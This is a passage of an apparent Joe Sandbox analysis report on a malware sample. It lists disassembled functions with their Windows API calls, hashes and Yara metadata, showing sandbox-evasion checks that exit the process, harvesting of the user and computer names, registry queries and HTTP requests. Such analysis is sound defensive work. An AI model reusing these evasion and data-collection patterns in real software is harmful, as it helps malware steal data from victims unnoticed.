                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A7F
                                                                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04AA0
                                                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04AB0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ??2@$CrackInternetlstrlen
                                                                                  • String ID: <
                                                                                  • API String ID: 1683549937-4251816714
                                                                                  • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                                                  • Instruction ID: b4e381528f016d85e2c8742ade995a2d7b576c553e8c9fd07d13d7e06a20f539
                                                                                  • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                                                  • Instruction Fuzzy Hash: DD213BB5D00219ABDF14EFA4E849AED7BB4FF44321F108265F925A72D0EB706A05CF91
                                                                                  Function 00417690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,009026D8,00000000,00020119,00000000), ref: 004176DD
                                                                                  • RegQueryValueExA.ADVAPI32(00000000,0090A040,00000000,00000000,?,000000FF), ref: 004176FE
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                  • String ID: Windows 11
                                                                                  • API String ID: 3466090806-2517555085
                                                                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                  • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                  • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                                                  Function 00B178F7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B1790B
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17912
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 00B17944
                                                                                  • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 00B17965
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B1796F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                  • String ID: Windows 11
                                                                                  • API String ID: 3225020163-2517555085
                                                                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                  • Instruction ID: eab6bdbde0d19adba7e73b4b67b994201a0db00f9da023f5037083124a64f737
                                                                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                  • Instruction Fuzzy Hash: FD012CB9A84204BBEB00DBE0DD49FADB7B9EB48701F505194BA0597281DA7499448B51
                                                                                  Function 00417720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,009026D8,00000000,00020119,004176B9), ref: 0041775B
                                                                                  • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                                                  • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                  • String ID: CurrentBuildNumber
                                                                                  • API String ID: 3466090806-1022791448
                                                                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                                                  • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                                                  • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                                                  Function 004192E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                                                  • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: :A$:A
                                                                                  • API String ID: 1378416451-1974578005
                                                                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                  • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                  • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                                                  Function 00B07537 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B075A1
                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B07618
                                                                                  • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B07674
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B076B9
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B076C0
                                                                                    • Part of subcall function 00B094A7: vsprintf_s.MSVCRT ref: 00B094C2
                                                                                  • task.LIBCPMTD ref: 00B077BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                                                  • String ID:
                                                                                  • API String ID: 700816787-0
                                                                                  • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                                                  • Instruction ID: 66134ffa769353242fd782df13b290bc92828dae64f413fdbd53bff8bdd273d9
                                                                                  • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                                                  • Instruction Fuzzy Hash: 2F61E8B59442689BDB24DB50CC85BE9BBF8BF54300F0081E9E689A6181DF706FC5CF95
                                                                                  Function 00B15527 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B064E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B06548
                                                                                    • Part of subcall function 00B064E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 00B0656A
                                                                                    • Part of subcall function 00B064E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B0659C
                                                                                    • Part of subcall function 00B064E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B065EC
                                                                                    • Part of subcall function 00B064E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B06626
                                                                                    • Part of subcall function 00B064E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B06638
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 00B1557F
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B15596
                                                                                    • Part of subcall function 00B19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B190B9
                                                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00B155CB
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B155EA
                                                                                  • strtok.MSVCRT(00000000,?), ref: 00B15605
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B15615
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                  • String ID:
                                                                                  • API String ID: 3532888709-0
                                                                                  • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                                                  • Instruction ID: a36eeca1ecc8618dcc36e464ba818dfe1d1c04fdddc78463309d29aa65500446
                                                                                  • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                                                  • Instruction Fuzzy Hash: B2512C70511208DBCB18FF64DE92AED7BB5AF50700FD04498F40A66591EB346B85CB52
                                                                                  Function 00B17337 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00B17345
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00B17574,004205BD), ref: 00B17383
                                                                                  • memset.MSVCRT ref: 00B173D1
                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B17525
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: OpenProcesslstrcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 224852652-0
                                                                                  • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                                                  • Instruction ID: 11c960ba529d88d784bdd3140d698d630869ad53f8ffbd4a662bbc8a7595b7d3
                                                                                  • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                                                  • Instruction Fuzzy Hash: 4B517DB0D442189BDB14EBA0DC85BEDB7B5EF54305F9040E8E109A7281EF746AC4CF59
                                                                                  Function 004140B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004140D5
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,0090A3D0,00000000,00020119,?), ref: 004140F4
                                                                                  • RegQueryValueExA.ADVAPI32(?,009099E0,00000000,00000000,00000000,000000FF), ref: 00414118
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                                                  • lstrcatA.KERNEL32(?,0090B278), ref: 0041415B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                  • String ID:
                                                                                  • API String ID: 2623679115-0
                                                                                  • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                                                  • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                                                  • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                                                  • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                                                  Function 00413560 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • strtok_s.MSVCRT ref: 00413588
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • strtok_s.MSVCRT ref: 004136D1
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpystrtok_s$lstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3184129880-0
                                                                                  • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                                                  • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                                                  • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                                                  • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                                                  Function 0041B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 0041B39A
                                                                                    • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                                                    • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                                                    • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                                                  • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                                                    • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                                                  • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 2005412495-0
                                                                                  • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                                                  • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                                                  • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                                                  • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                                                  Function 00B16C57 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B19B08
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B19B21
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B19B39
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B19B51
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B19B6A
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B19B82
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B19B9A
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B19BB3
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B19BCB
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B19BE3
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B19BFC
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B19C14
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B19C2C
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B19C45
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B01437: ExitProcess.KERNEL32 ref: 00B01478
                                                                                    • Part of subcall function 00B013C7: GetSystemInfo.KERNEL32(?), ref: 00B013D1
                                                                                    • Part of subcall function 00B013C7: ExitProcess.KERNEL32 ref: 00B013E5
                                                                                    • Part of subcall function 00B01377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B01392
                                                                                    • Part of subcall function 00B01377: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B01399
                                                                                    • Part of subcall function 00B01377: ExitProcess.KERNEL32 ref: 00B013AA
                                                                                    • Part of subcall function 00B01487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B014A5
                                                                                    • Part of subcall function 00B01487: __aulldiv.LIBCMT ref: 00B014BF
                                                                                    • Part of subcall function 00B01487: __aulldiv.LIBCMT ref: 00B014CD
                                                                                    • Part of subcall function 00B01487: ExitProcess.KERNEL32 ref: 00B014FB
                                                                                    • Part of subcall function 00B169D7: GetUserDefaultLangID.KERNEL32 ref: 00B169DB
                                                                                    • Part of subcall function 00B013F7: ExitProcess.KERNEL32 ref: 00B0142D
                                                                                    • Part of subcall function 00B17AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B0141E), ref: 00B17AE7
                                                                                    • Part of subcall function 00B17AB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B17AEE
                                                                                    • Part of subcall function 00B17AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B17B06
                                                                                    • Part of subcall function 00B17B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17B77
                                                                                    • Part of subcall function 00B17B47: RtlAllocateHeap.NTDLL(00000000), ref: 00B17B7E
                                                                                    • Part of subcall function 00B17B47: GetComputerNameA.KERNEL32(?,00000104), ref: 00B17B96
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B16D31
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B16D4F
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B16D60
                                                                                  • Sleep.KERNEL32(00001770), ref: 00B16D6B
                                                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B16D81
                                                                                  • ExitProcess.KERNEL32 ref: 00B16D89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2525456742-0
                                                                                  • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                                                  • Instruction ID: b2d22327f8ac3e0c99b823a6855acc7c1aac60abee9def9e8c4bf65a9001590f
                                                                                  • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                                                  • Instruction Fuzzy Hash: 43316171A40204ABDB08F7F0DC56FFD7BF5AF14700F9015A8F11262192EF746A84CA62
                                                                                  Function 004099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                  • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                  • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
